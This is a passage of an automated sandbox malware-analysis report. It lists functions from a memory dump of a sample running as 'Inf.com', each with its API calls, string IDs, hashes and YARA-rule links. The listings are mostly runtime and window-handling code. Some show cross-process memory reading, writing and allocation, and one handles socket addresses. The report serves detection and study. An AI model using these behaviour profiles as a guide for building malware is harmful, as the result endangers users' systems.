                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0B01AEB2800B16DFCB30AFA6D980816FBF9BF603153158A3ED19752931C7B0A959DF80
                                                                                                                                                                                                                                                                                                    Function 00A765AB Relevance: 7.5, APIs: 5, Instructions: 40windowtimeCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • GetDlgItem.USER32(?,000003E9), ref: 00A765BF
                                                                                                                                                                                                                                                                                                    • GetWindowTextW.USER32(00000000,?,00000100), ref: 00A765D6
                                                                                                                                                                                                                                                                                                    • MessageBeep.USER32(00000000), ref: 00A765EE
                                                                                                                                                                                                                                                                                                    • KillTimer.USER32(?,0000040A), ref: 00A7660A
                                                                                                                                                                                                                                                                                                    • EndDialog.USER32(?,00000001), ref: 00A76624
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 3741023627-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: 97476a171b00cf4d87acad9fcf1b8d1e3a8cdbac3d9c41a94eb506d637c488e4
                                                                                                                                                                                                                                                                                                    • Instruction ID: 73a97216d156b63f8d0ae4c582aa3520c497dafe8a14b53e59079db3002b3fbf
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 97476a171b00cf4d87acad9fcf1b8d1e3a8cdbac3d9c41a94eb506d637c488e4
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: CC018630500705ABEB249F50DE4EBD6BB78FB05705F408659B1C7614E1EBF4AA458A54
                                                                                                                                                                                                                                                                                                    Function 00A4DABA Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00A4DAD2
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A42D38: RtlFreeHeap.NTDLL(00000000,00000000,?,00A4DB51,00AE1DC4,00000000,00AE1DC4,00000000,?,00A4DB78,00AE1DC4,00000007,00AE1DC4,?,00A4DF75,00AE1DC4), ref: 00A42D4E
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A42D38: GetLastError.KERNEL32(00AE1DC4,?,00A4DB51,00AE1DC4,00000000,00AE1DC4,00000000,?,00A4DB78,00AE1DC4,00000007,00AE1DC4,?,00A4DF75,00AE1DC4,00AE1DC4), ref: 00A42D60
                                                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00A4DAE4
                                                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00A4DAF6
                                                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00A4DB08
                                                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00A4DB1A
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 776569668-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: 2ba1bc3e0f0b2a6411d4867169e6c4c5980c39566a3319be22c00bd95691bd25
                                                                                                                                                                                                                                                                                                    • Instruction ID: 1e0b45b318636a49afa942c46fe4749309674545e005cc5af9f2bc7e130b82d7
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2ba1bc3e0f0b2a6411d4867169e6c4c5980c39566a3319be22c00bd95691bd25
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 04F03036946604ABC635EBA8FA86E1A77EDFE847507E50C1AF00AD7501CB30FC818B64
                                                                                                                                                                                                                                                                                                    Function 00A42610 Relevance: 7.5, APIs: 5, Instructions: 30COMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00A4262E
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A42D38: RtlFreeHeap.NTDLL(00000000,00000000,?,00A4DB51,00AE1DC4,00000000,00AE1DC4,00000000,?,00A4DB78,00AE1DC4,00000007,00AE1DC4,?,00A4DF75,00AE1DC4), ref: 00A42D4E
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A42D38: GetLastError.KERNEL32(00AE1DC4,?,00A4DB51,00AE1DC4,00000000,00AE1DC4,00000000,?,00A4DB78,00AE1DC4,00000007,00AE1DC4,?,00A4DF75,00AE1DC4,00AE1DC4), ref: 00A42D60
                                                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00A42640
                                                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00A42653
                                                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00A42664
                                                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00A42675
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 776569668-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: c07adff44fe4239f7a5a619f6cd56490cf7cc9bc1b60e958562177c248a83625
                                                                                                                                                                                                                                                                                                    • Instruction ID: 518c075f505f7b0244eb8bd0fc1a2eacfdfafbd62931763473f66655879b9a17
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c07adff44fe4239f7a5a619f6cd56490cf7cc9bc1b60e958562177c248a83625
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0DF0FE788421A09B9B22EFD8FD81E8C3B68FB64761385095BF415DA275C7310903BFC4
                                                                                                                                                                                                                                                                                                    Function 00A412B7 Relevance: 7.4, APIs: 2, Strings: 2, Instructions: 389COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: __freea$_free
                                                                                                                                                                                                                                                                                                    • String ID: a/p$am/pm
                                                                                                                                                                                                                                                                                                    • API String ID: 3432400110-3206640213
                                                                                                                                                                                                                                                                                                    • Opcode ID: c3057a7faa620cc8170c89c627da2a32ae77671c39378dc40abfe3babe802d06
                                                                                                                                                                                                                                                                                                    • Instruction ID: 986e20abbd8e6e416f2680f1823516eb0e9dfe16fd9d1dd50138ca1a34067b09
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c3057a7faa620cc8170c89c627da2a32ae77671c39378dc40abfe3babe802d06
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 50D1127DA10206DACB249F68C955BFABBB1FFC5300F29415AE902AB250D375DDC0CBA1
                                                                                                                                                                                                                                                                                                    Function 00A73063 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 121windowCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A7BDCA: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00A72B1D,?,?,00000034,00000800,?,00000034), ref: 00A7BDF4
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 00A730AD
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A7BD95: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00A72B4C,?,?,00000800,?,00001073,00000000,?,?), ref: 00A7BDBF
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A7BCF1: GetWindowThreadProcessId.USER32(?,?), ref: 00A7BD1C
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A7BCF1: OpenProcess.KERNEL32(00000438,00000000,?,?,?,00A72AE1,00000034,?,?,00001004,00000000,00000000), ref: 00A7BD2C
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A7BCF1: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,00A72AE1,00000034,?,?,00001004,00000000,00000000), ref: 00A7BD42
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00A7311A
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00A73167
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                                                                                                                                                                                                                                                                    • String ID: @
                                                                                                                                                                                                                                                                                                    • API String ID: 4150878124-2766056989
                                                                                                                                                                                                                                                                                                    • Opcode ID: ec552479faa01eb64ca330881ada5b5d1b508619391794a44e0888d32866d219
                                                                                                                                                                                                                                                                                                    • Instruction ID: 27ccdab7b8e9588bb2da663a44a17aebfe81641ec35f49923fdc249b765ae57c
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ec552479faa01eb64ca330881ada5b5d1b508619391794a44e0888d32866d219
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: EC4118B2900218BEDF11DBA4CD81ADEBBB8EF49700F108195EA59B7181DB706E85DB60
                                                                                                                                                                                                                                                                                                    Function 00A41A9E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 115COMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com,00000104), ref: 00A41AD9
                                                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00A41BA4
                                                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00A41BAE
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: _free$FileModuleName
                                                                                                                                                                                                                                                                                                    • String ID: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com
                                                                                                                                                                                                                                                                                                    • API String ID: 2506810119-1499414326
                                                                                                                                                                                                                                                                                                    • Opcode ID: 9919e1f5e447cf55a16d9995dd64b1e2e5d9f8d71ec2b74764a105b0e298da4d
                                                                                                                                                                                                                                                                                                    • Instruction ID: c6c3e4bc093be41aaf52b84aa51ad98f5158df344d58f70343b29ed89e7da0d7
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9919e1f5e447cf55a16d9995dd64b1e2e5d9f8d71ec2b74764a105b0e298da4d
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3A316075E00258AFDB21DF99DD85D9EBBFCEBC5750B1041A6F9049B211E7B04E82CB90
                                                                                                                                                                                                                                                                                                    Function 00A7CB28 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 114windowCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 00A7CBB1
                                                                                                                                                                                                                                                                                                    • DeleteMenu.USER32(?,00000007,00000000), ref: 00A7CBF7
                                                                                                                                                                                                                                                                                                    • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00AE29C0,01266C50), ref: 00A7CC40
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Menu$Delete$InfoItem
                                                                                                                                                                                                                                                                                                    • String ID: 0
                                                                                                                                                                                                                                                                                                    • API String ID: 135850232-4108050209
                                                                                                                                                                                                                                                                                                    • Opcode ID: 62a20085cd3641d65573fed2a5da64f4a85797511a1ff91c9bc3d37e2658c1f3
                                                                                                                                                                                                                                                                                                    • Instruction ID: f2ef72c1be4c1c5c5618eb462d1444d2af4ef97b14f9987ded5c0dcd14a9a2bc
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 62a20085cd3641d65573fed2a5da64f4a85797511a1ff91c9bc3d37e2658c1f3
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8A41AD312043029FD725DF24DD85B6ABBE8AF85724F14CA1DF8A997291DB30A904CB66
                                                                                                                                                                                                                                                                                                    Function 00AA4EB4 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 106COMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,00AADCD0,00000000,?,?,?,?), ref: 00AA4F48
                                                                                                                                                                                                                                                                                                    • GetWindowLongW.USER32 ref: 00AA4F65
                                                                                                                                                                                                                                                                                                    • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00AA4F75
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Window$Long
                                                                                                                                                                                                                                                                                                    • String ID: SysTreeView32
                                                                                                                                                                                                                                                                                                    • API String ID: 847901565-1698111956
                                                                                                                                                                                                                                                                                                    • Opcode ID: 596a619a1a5dc26412b4f64655c8092415ef54dcc292bf620fb61470f0615181
                                                                                                                                                                                                                                                                                                    • Instruction ID: 19fa4a2e2fe897da0e083c7e43224d91dc9d4924e894af447af6b695c163b087
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 596a619a1a5dc26412b4f64655c8092415ef54dcc292bf620fb61470f0615181
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 38319E71214205AFDB218F78CC45BEA7BA9EB4A334F205725F9B9A31E0D7B0AC519B50
                                                                                                                                                                                                                                                                                                    Function 00A93AAB Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 90networkCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A93DB8: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,?,?,00A93AD4,?,?), ref: 00A93DD5
                                                                                                                                                                                                                                                                                                    • inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 00A93AD7
                                                                                                                                                                                                                                                                                                    • _wcslen.LIBCMT ref: 00A93AF8
                                                                                                                                                                                                                                                                                                    • htons.WSOCK32(00000000,?,?,00000000), ref: 00A93B63
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: ByteCharMultiWide_wcslenhtonsinet_addr
                                                                                                                                                                                                                                                                                                    • String ID: 255.255.255.255
                                                                                                                                                                                                                                                                                                    • API String ID: 946324512-2422070025
                                                                                                                                                                                                                                                                                                    • Opcode ID: ae60dd859ceb7428d0e85630ccb2b1303c312635e336fe7ef03cf6b8d75aa360
                                                                                                                                                                                                                                                                                                    • Instruction ID: 40757dbbc46ffac863426a33f7b945205109ea4ef4482137fb349453d28cc37e
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ae60dd859ceb7428d0e85630ccb2b1303c312635e336fe7ef03cf6b8d75aa360
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: FF3193367002019FCF10CF68C586EAA77F1EF15328F248159E8168B792D771EE45C760
                                                                                                                                                                                                                                                                                                    Function 00AA4954 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 89windowCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 00AA49DC
                                                                                                                                                                                                                                                                                                    • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00AA49F0
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001002,00000000,?), ref: 00AA4A14
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: MessageSend$Window
                                                                                                                                                                                                                                                                                                    • String ID: SysMonthCal32
                                                                                                                                                                                                                                                                                                    • API String ID: 2326795674-1439706946
                                                                                                                                                                                                                                                                                                    • Opcode ID: 8c409a6c6c98e33d0ed71c9e7a19948a62bc230de0524d2b5ac9b26a3e1aff0f
                                                                                                                                                                                                                                                                                                    • Instruction ID: fa7e85c72396d65383d1c91f04092ac647d58882b40d1cc77d71de5e81500149
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8c409a6c6c98e33d0ed71c9e7a19948a62bc230de0524d2b5ac9b26a3e1aff0f
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1321AD32610219ABDF11CF90CC42FEB3B69EF89714F110214FA556B1D0D7B5A8519B90
                                                                                                                                                                                                                                                                                                    Function 00AA50F1 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 87windowCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 00AA51A3
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 00AA51B1
                                                                                                                                                                                                                                                                                                    • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00AA51B8
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmpDownload File
